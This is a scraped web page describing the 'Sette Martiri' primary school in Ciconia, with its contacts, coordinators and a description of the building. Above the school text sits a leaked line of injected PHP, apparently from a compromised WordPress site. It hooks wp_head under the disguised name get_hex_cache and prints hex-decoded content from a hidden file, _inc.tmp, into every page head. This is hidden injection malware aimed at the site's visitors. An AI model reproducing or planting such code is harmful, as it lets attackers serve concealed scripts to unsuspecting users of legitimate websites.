if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Primaria di Ciconia – Istituto Comprensivo Orvieto-Montecchio

Primaria di Ciconia

Gallery with ID 2 doesn't exist.

Via delle Ortensie, 1    tel. 0763 393731    fax 0763 302511
Coordinatore di plesso: Inss. Agnese Penna e Caterina Di Nuzzo

La scuola primaria “Sette Martiri” é situata in loc. Ciconia. L’edificio risale agli anni Sessanta ed é stato più volte ampliato nel corso degli anni. E’ circondato da un ampio giardino, utilizzato dagli alunni per i momenti ricreativi. Al primo piano si trovano le sei aule del tempo normale, il locale mensa, l’aula docenti e la biblioteca. Al piano superiore si trovano l’ambulatorio, due aule polivalenti e otto classi. La palestra si trova nel seminterrato dell’edificio ed é dotata di un’uscita di sicurezza propria. La scuola é ubicata in un territorio di periferia urbana in cui sono presenti situazioni socio-culturali diverse; é frequentata da alunni provenienti sia da Ciconia che da zone limitrofe del Comprensorio Orvietano e da stranieri.